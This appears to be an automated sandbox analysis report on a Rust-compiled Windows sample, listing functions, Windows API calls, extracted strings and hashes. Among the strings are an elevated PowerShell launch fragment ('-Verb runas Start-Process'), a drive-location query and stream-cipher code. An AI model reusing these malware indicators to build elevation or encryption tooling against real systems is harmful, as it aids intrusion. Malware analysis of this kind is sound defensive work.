Instruction ID: 78d8ef63b44776d73b391faf585540d45a8dd976fde1ceb69abcf3f4b2226cb2
Opcode Fuzzy Hash: 541df0af01ddc851ca3a6e79d3f88c25d58b4ed7b14398c9ab80f9e4bbae3d0d
Instruction Fuzzy Hash: 9281C962B08BD188EB719F61E8447E963A5FB047D8F644136DF5C9BBC9DF3992868300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E54300, Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 215COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF606E544A2

Strings

SleepConditionVariableSRW, xrefs: 00007FF606E54402
AcquireSRWLockExclusive, xrefs: 00007FF606E54510
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E544CD, 00007FF606E545BA
inconsistent park state, xrefs: 00007FF606E545F6
use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF606E545D8
ReleaseSRWLockExclusive, xrefs: 00007FF606E54552
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E5463E

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive$SleepConditionVariableSRW$called `Result::unwrap()` on an `Err` value$inconsistent park state$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
API String ID: 3988221542-1218418010
Opcode ID: 476a34e517663de6707aabd87a35e66038b8b77904ee6b7f04dc8b6b129bae6e
Instruction ID: 1dc20b5da0c1ee1c60b2c85936ca7bebd61cee51df81996cac8948c286f56df4
Opcode Fuzzy Hash: 476a34e517663de6707aabd87a35e66038b8b77904ee6b7f04dc8b6b129bae6e
Instruction Fuzzy Hash: 6CB12B21A0DB8299EB119F20E8443E937E5FF54398F644135EA4D837A5EF3EE596C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5F9A0, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF606E5F9C1
TlsGetValue.KERNEL32 ref: 00007FF606E5F9DF
TlsSetValue.KERNEL32(00000000,?,?,00007FF606E53E44,?,?,?,?,?,?,00000000,00007FF606E60EEC), ref: 00007FF606E5FAD1
TlsSetValue.KERNEL32 ref: 00007FF606E5FBA4
TlsGetValue.KERNEL32 ref: 00007FF606E5FC59

Strings

Box<Any><unnamed>, xrefs: 00007FF606E5FB73

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value
String ID: Box<Any><unnamed>
API String ID: 3702945584-3419748868
Opcode ID: 36966c64e56e6fddd598353061375bda76dbe632d68df7552caf08eb865959dc
Instruction ID: b90de12c07aaf7a41c4d759b37f1781a0ead4b9cc729fb0e09709b5ec00b66eb
Opcode Fuzzy Hash: 36966c64e56e6fddd598353061375bda76dbe632d68df7552caf08eb865959dc
Instruction Fuzzy Hash: 8661D322F0DB4681FE549B91E9153B82791AF80BD4F648535DE0D8B7D6EF3EE5028700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E54810, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 165COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF606E54926

Strings

AcquireSRWLockExclusive, xrefs: 00007FF606E54935
failed to generate unique thread ID: bitspace exhausted, xrefs: 00007FF606E54A35
thread name may not contain interior null bytes, xrefs: 00007FF606E54A17
ReleaseSRWLockExclusive, xrefs: 00007FF606E54973
called `Option::unwrap()` on a `None` value, xrefs: 00007FF606E54A4F

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted$thread name may not contain interior null bytes
API String ID: 3988221542-3361540753
Opcode ID: e3a97cc61fa35a920321b222597544febae4f83025f03a9f1dbe64b5545e0ee9
Instruction ID: 59e632640b63bfc9b2ee2830ca1bffc6ca0631df14c355af795e007387a439a9
Opcode Fuzzy Hash: e3a97cc61fa35a920321b222597544febae4f83025f03a9f1dbe64b5545e0ee9
Instruction Fuzzy Hash: 09717361E0CB82D4FB118F64E8012F863B0BF94758FA49635DA5C926D5EF3DA6D5C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E661C0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E661FC
SetLastError.KERNEL32 ref: 00007FF606E6628F
GetModuleFileNameW.KERNEL32 ref: 00007FF606E6629C
GetLastError.KERNEL32 ref: 00007FF606E662A7
GetLastError.KERNEL32 ref: 00007FF606E662C0
GetLastError.KERNEL32 ref: 00007FF606E6633B

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$FileModuleNamememset
String ID:
API String ID: 3770714783-0
Opcode ID: da87e530f818d1ef33f74cf6f6780e223122890b2a2b5e6a7999f6accd044919
Instruction ID: 47909a224b9a524ac26f895216c719ef5fb8733032f5cc5a471a30e6ca3ed657
Opcode Fuzzy Hash: da87e530f818d1ef33f74cf6f6780e223122890b2a2b5e6a7999f6accd044919
Instruction Fuzzy Hash: A3512322A1C78181FB619F21EC043F96314BB54BE8F248136EE5C9B7C5DE3EE2828340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E54B60, Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E54B9C
SetLastError.KERNEL32 ref: 00007FF606E54C2F
GetCurrentDirectoryW.KERNEL32 ref: 00007FF606E54C39
GetLastError.KERNEL32 ref: 00007FF606E54C44
GetLastError.KERNEL32 ref: 00007FF606E54C5D
GetLastError.KERNEL32 ref: 00007FF606E54CD8

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$CurrentDirectorymemset
String ID:
API String ID: 609395768-0
Opcode ID: 8143bbfb3aed88c8900e563986f9cef5cee5359b14bffcf8782d74349982121a
Instruction ID: 0a22921780e59ab6c8b58a9cf1faa2a60be6b9d7bae201775ae4accaa6f25353
Opcode Fuzzy Hash: 8143bbfb3aed88c8900e563986f9cef5cee5359b14bffcf8782d74349982121a
Instruction Fuzzy Hash: 7651E562E0C79281FB719F21A8047F96294BB54B98F248532DE5D5B7C9DF7DD2C68300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E63140, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 115COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF606E5E000), ref: 00007FF606E631D2

Strings

inconsistent state in unpark, xrefs: 00007FF606E632C8
AcquireSRWLockExclusive, xrefs: 00007FF606E631ED
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E632F7
WakeConditionVariablerwlocks not available, xrefs: 00007FF606E63266
ReleaseSRWLockExclusive, xrefs: 00007FF606E6322B

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$WakeConditionVariablerwlocks not available$called `Result::unwrap()` on an `Err` value$inconsistent state in unpark
API String ID: 3988221542-92624130
Opcode ID: a79f882acd7d46f2c72c06117fa98afe71cb0938a838115e6ce315179775cf80
Instruction ID: e39376157351f504bd6ff7066cf3a00374e51bc1b80fc84a9606a250394af147
Opcode Fuzzy Hash: a79f882acd7d46f2c72c06117fa98afe71cb0938a838115e6ce315179775cf80
Instruction Fuzzy Hash: B0415821F0DB0295FE119B54A8502B923A0AF94794FB45536EA5D833E5EF2EF94A8380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606EB6760, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 00007FF606EB6845
VerSetConditionMask.KERNEL32 ref: 00007FF606EB6854
VerSetConditionMask.KERNEL32 ref: 00007FF606EB6866
VerSetConditionMask.KERNEL32 ref: 00007FF606EB6878
VerSetConditionMask.KERNEL32 ref: 00007FF606EB688E
VerifyVersionInfoA.KERNEL32 ref: 00007FF606EB68A1

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: db068c0b10313aecae98907a2b785d64f32f2708e42cfa7b40ece749a5e8cfd6
Instruction ID: 02e6d4b5150f80357df927ef9d1efeb4721b96dfe4f0fb008d0d82aa960d3199
Opcode Fuzzy Hash: db068c0b10313aecae98907a2b785d64f32f2708e42cfa7b40ece749a5e8cfd6
Instruction Fuzzy Hash: 6841D422E1C7928BF6348B11A4207BBB790EBD5700F256235E9CE43A94DF7EE5858F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E65700, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65753
DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65767
EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65785

Strings

AcquireSRWLockExclusive, xrefs: 00007FF606E6579B, 00007FF606E657DD
cannot recursively lock a mutexlibrary\std\src\sys\windows\mutex.rs, xrefs: 00007FF606E65810

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitialize
String ID: AcquireSRWLockExclusive$cannot recursively lock a mutexlibrary\std\src\sys\windows\mutex.rs
API String ID: 542031744-94582581
Opcode ID: 14f147bbdbb55a4160f5c9d83c86b00b2b0fd4cbb03da210fe85fd1a7a559364
Instruction ID: a535a1811bd16ce3475696ac618b995cca2f8227f79f0151802083202f668b66
Opcode Fuzzy Hash: 14f147bbdbb55a4160f5c9d83c86b00b2b0fd4cbb03da210fe85fd1a7a559364
Instruction Fuzzy Hash: AA31D820F1EB1281FE459B01AA503B513519F947D0FB48435EE4DCBBE5EE6FB9468350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E383C0, Relevance: 7.9, APIs: 6, Instructions: 421COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E38425
memmove.VCRUNTIME140 ref: 00007FF606E3879D

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 762e46e610d80d92c5b5b41304a20ddca3225974a4b9fd876f870b1cc7d828b6
Instruction ID: c51576cd6884b2fa3734216433805decbda2bcbc0bbdb256582935c6f140e725
Opcode Fuzzy Hash: 762e46e610d80d92c5b5b41304a20ddca3225974a4b9fd876f870b1cc7d828b6
Instruction Fuzzy Hash: 99321722918BD589F7718F28C8457F96360FBA575CF249321DF8C5AA6AEF25A3C5C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E24890, Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF606E54B60: memset.VCRUNTIME140 ref: 00007FF606E54B9C
Part of subcall function 00007FF606E54B60: SetLastError.KERNEL32 ref: 00007FF606E54C2F
Part of subcall function 00007FF606E54B60: GetCurrentDirectoryW.KERNEL32 ref: 00007FF606E54C39
Part of subcall function 00007FF606E54B60: GetLastError.KERNEL32 ref: 00007FF606E54C44
Part of subcall function 00007FF606E54B60: GetLastError.KERNEL32 ref: 00007FF606E54C5D

memmove.VCRUNTIME140 ref: 00007FF606E24A4A

Strings

C:\lasfnmrqqeopERROR\, xrefs: 00007FF606E248DD, 00007FF606E249BC
(get-location).Drive.Name, xrefs: 00007FF606E24A4F
powershell-VerbrunasStart-Process, xrefs: 00007FF606E24A1D
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E24E19

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$CurrentDirectorymemmovememset
String ID: (get-location).Drive.Name$C:\lasfnmrqqeopERROR\$called `Result::unwrap()` on an `Err` value$powershell-VerbrunasStart-Process
API String ID: 3954027298-2030083228
Opcode ID: 18814bc6dbb627679dcb9cebbeb66b4516aec47806b29821829a088c268ce5e1
Instruction ID: 7df7f3e0f242ba9de705d8509d765ebc4ab1564e3ab295bfc54979a68313a21b
Opcode Fuzzy Hash: 18814bc6dbb627679dcb9cebbeb66b4516aec47806b29821829a088c268ce5e1
Instruction Fuzzy Hash: 5CF14D36608BC688EB729F25D8417E933A1FB58798F548531DA4C4BB99EF3AD685C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E96DD0, Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000001,00007FF606E868D1,?,?,?,?,00007FF606E4A939), ref: 00007FF606E96DE7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000001,00007FF606E868D1,?,?,?,?,00007FF606E4A939), ref: 00007FF606E96E26

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: callocfree
String ID:
API String ID: 306872129-0
Opcode ID: 1c062614b4007bb50931f4d551f4aae67246f8b63b8ba65fbc46f03da7f7952d
Instruction ID: d0d59f786e8d1f58eb425a879a8f78b07641c9aac369f29e92950656e979a21b
Opcode Fuzzy Hash: 1c062614b4007bb50931f4d551f4aae67246f8b63b8ba65fbc46f03da7f7952d
Instruction Fuzzy Hash: 4A813732908BC186E341CF38D9443E937A0FB59B6CF185339DF984A2AADF7991858720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5FD00, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF606E65700: InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65753
Part of subcall function 00007FF606E65700: DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65767
Part of subcall function 00007FF606E65700: EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65785

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF606E5FA79,00000000,?,?), ref: 00007FF606E5FDC2

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESlibrary\std\src\sys\windows\thread_local_key.rs, xrefs: 00007FF606E5FE3E
AcquireSRWLockExclusive, xrefs: 00007FF606E5FDC9
ReleaseSRWLockExclusive, xrefs: 00007FF606E5FE07
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E5FE73

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitializeLeave
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive$assertion failed: key != c::TLS_OUT_OF_INDEXESlibrary\std\src\sys\windows\thread_local_key.rs
API String ID: 1090962914-1632340299
Opcode ID: 679806c8a23035db2390a85410c1ba284dbb1b4e553a748db77803428c44e9da
Instruction ID: 3abc8bdadd4dc96d5a5797732f00d0b31a85953c442c598cfdac8230aca9b11a
Opcode Fuzzy Hash: 679806c8a23035db2390a85410c1ba284dbb1b4e553a748db77803428c44e9da
Instruction Fuzzy Hash: 31519A32B0DB1295FB109F55E8403B827A0AF847A4FA48535EA4D837E5EF3EE946C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E748C0, Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 261COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E74A03

Strings

capacity overflow, xrefs: 00007FF606E748C4
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E748E7

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$capacity overflow
API String ID: 2162964266-2340786982
Opcode ID: 40a0bcc38dd754a6d382a8c6e4cada755a73e9e87941a1c24ca64155fae659cf
Instruction ID: 039ad34f58f8d14dd7476febe805b14d41eeec5ccc605d5237f83538241998cc
Opcode Fuzzy Hash: 40a0bcc38dd754a6d382a8c6e4cada755a73e9e87941a1c24ca64155fae659cf
Instruction Fuzzy Hash: 85A1A022B0DB92C5FB059B61A5003BD27E0AF44B88F648435DE4D9BBCADF3EE5458300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E61270, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF606E61456

Strings

AcquireSRWLockExclusive, xrefs: 00007FF606E61463
ReleaseSRWLockExclusive, xrefs: 00007FF606E614A1
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E61399

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive
API String ID: 3988221542-3172517583
Opcode ID: 924bd63707d1d04bd704355683d74d692b29f3407a5672f04997b01a6c334238
Instruction ID: 7077ee86cee80366273974bb29026d238fa30a630c100a7271dd5901e4e16593
Opcode Fuzzy Hash: 924bd63707d1d04bd704355683d74d692b29f3407a5672f04997b01a6c334238
Instruction Fuzzy Hash: 73814C36A0CB4289EB11CF65E8403AD33A4FB44B98FA48536DA8D877A4EF7ED555C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E29C00, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E29C63
memmove.VCRUNTIME140 ref: 00007FF606E29D65
memmove.VCRUNTIME140 ref: 00007FF606E29DA1

Strings

failed to spawn thread, xrefs: 00007FF606E29E8D

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: failed to spawn thread
API String ID: 2162964266-1155329311
Opcode ID: 77aae279f0b66a604b91c8ac9909efa5e36cb3cc7567594fbc50088b3666335e
Instruction ID: ac18066d70500cfcf94c53d8bc559b6ef1190dfa6a8133e64cbcca02cc80268d
Opcode Fuzzy Hash: 77aae279f0b66a604b91c8ac9909efa5e36cb3cc7567594fbc50088b3666335e
Instruction Fuzzy Hash: CF818032908BC589E7218F25DC413E937A0FB59358F549125EB8C4BB9ADF39D686C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5DA60, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF606E65700: InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65753
Part of subcall function 00007FF606E65700: DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65767
Part of subcall function 00007FF606E65700: EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF606E5FD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF606E65785

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF606E3C08E), ref: 00007FF606E5DB19

Strings

AcquireSRWLockExclusive, xrefs: 00007FF606E5DB35
called `Option::unwrap()` on a `None` value, xrefs: 00007FF606E5DC60
ReleaseSRWLockExclusive, xrefs: 00007FF606E5DB65

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitializeLeave
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$called `Option::unwrap()` on a `None` value
API String ID: 1090962914-225517436
Opcode ID: f24f845ebba6e9662e9b2e09c492ca12c1443a576e4478674f9d26d01ff1d00f
Instruction ID: bd39f2c9388f73ea214538d8ca04fa5dfdacf211f21ed548cca8ecf230636479
Opcode Fuzzy Hash: f24f845ebba6e9662e9b2e09c492ca12c1443a576e4478674f9d26d01ff1d00f
Instruction Fuzzy Hash: E951BF62B0DB0295FB55DB55EC402B927A1BF847A4FA48431DE4D977A9EF3EE482C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3DF10, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E3DFCA
memmove.VCRUNTIME140 ref: 00007FF606E3E063
memmove.VCRUNTIME140 ref: 00007FF606E3E0A0

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF606E3E0D8

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-704964686
Opcode ID: d300be64059b9a8c2e62c015c953dcda5bf751e91c2161f82d7f4a67bd8d87bb
Instruction ID: ceba4d03d1a48c3a95aae1374c54a057ef65f7d8948ade8f7fc72cd6d47e125f
Opcode Fuzzy Hash: d300be64059b9a8c2e62c015c953dcda5bf751e91c2161f82d7f4a67bd8d87bb
